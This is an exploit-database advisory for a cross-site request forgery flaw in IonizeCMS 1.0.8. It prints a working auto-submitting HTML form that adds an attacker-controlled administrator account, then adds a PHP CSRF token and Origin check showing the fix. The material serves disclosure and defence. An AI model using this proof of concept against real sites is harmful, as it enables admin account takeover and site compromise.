IonizeCMS 1.0.8 - Cross-Site Request Forgery (Add Admin)
<!--
# Exploit Title: IonizeCMS <= 1.0.8 Remote Admin Add CSRF Exploit
# Exploit Author: s0nk3y
# Google Dork: -
# Date: 21/06/2016
# Vendor Homepage: http://ionizecms.com/
# Software Link: https://github.com/ionize/ionize/archive/1.0.8.1.zip
# Version: 1.0.8
# Tested on: Ubuntu 16.04

IonizeCMS is vulnerable to a CSRF attack (no CSRF token in place), meaning that if an admin user can be tricked into visiting a crafted URL created by an attacker (via spear phishing/social engineering), a form will be submitted to (http://localhost/en/admin/user/save) that will add a new user as administrator.

Once exploited, the attacker can log in to the admin panel (http://localhost/en/admin/auth/login) using the username and the password he posted in the form.

CSRF PoC Code
=============
-->

<form method="post" action="http://localhost/en/admin/user/save">
  <input type="hidden" name="id_user"/>
  <input type="hidden" name="join_date"/>
  <input type="hidden" name="salt"/>
  <input type="hidden" name="from"/>
  <input type="hidden" name="username" value="attacker">
  <input type="hidden" name="screen_name" value="attacker">
  <input type="hidden" name="email" value="[email protected]"/>
  <input type="hidden" name="id_role" value="2"/>
  <input type="hidden" name="password" value="attackerPassword"/>
  <input type="hidden" name="password2" value="attackerPassword"/>
</form>
<script>
  document.forms[0].submit();
</script>

# 0day.today [2024-07-02] #
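
The advisory attributes the issue to the missing CSRF token on the user-save form. As an added example (not IonizeCMS code and not from the exploit author), this framework-neutral PHP guard shows the check a state-changing handler such as `/en/admin/user/save` could run before acting; the function names, the `csrf_token` field name and the sample hosts are assumptions.

```php
<?php
// Added example: framework-neutral CSRF guard. Helper names are hypothetical.
declare(strict_types=1);

/** Create (once per session) and return the token to embed in every admin form. */
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32)); // 256-bit random value
    }
    return $session['csrf_token'];
}

/** True only if the POST carries the session's token and any Origin/Referer is same-host. */
function csrf_request_is_valid(array $session, array $post, array $server, string $expectedHost): bool
{
    $known = $session['csrf_token'] ?? '';
    $sent  = $post['csrf_token'] ?? '';
    if (!is_string($known) || $known === '' || !is_string($sent)) {
        return false; // no token issued for this session, or none submitted
    }
    if (!hash_equals($known, $sent)) { // constant-time comparison
        return false;
    }
    // Defence in depth: if the browser sent Origin or Referer, its host must be ours.
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? null;
    if ($source !== null) {
        $host = parse_url((string) $source, PHP_URL_HOST);
        if (!is_string($host) || strcasecmp($host, $expectedHost) !== 0) {
            return false;
        }
    }
    return true;
}

// Constructed requests (sample data, not captured traffic).
$session = [];
$token   = csrf_token($session);

// Cross-site auto-submitted form: same fields as the PoC, no token, foreign Origin.
$forged = ['username' => 'attacker', 'id_role' => '2'];
var_dump(csrf_request_is_valid($session, $forged, ['HTTP_ORIGIN' => 'http://other-site.example'], 'localhost'));

// Admin's own form: token was rendered into the page as a hidden field, same origin.
$legit = ['username' => 'editor1', 'id_role' => '2', 'csrf_token' => $token];
var_dump(csrf_request_is_valid($session, $legit, ['HTTP_ORIGIN' => 'http://localhost'], 'localhost'));
```

In a real handler `$session`, `$post` and `$server` would be `$_SESSION`, `$_POST` and `$_SERVER`, and a failed check should return HTTP 403 before any user record is written.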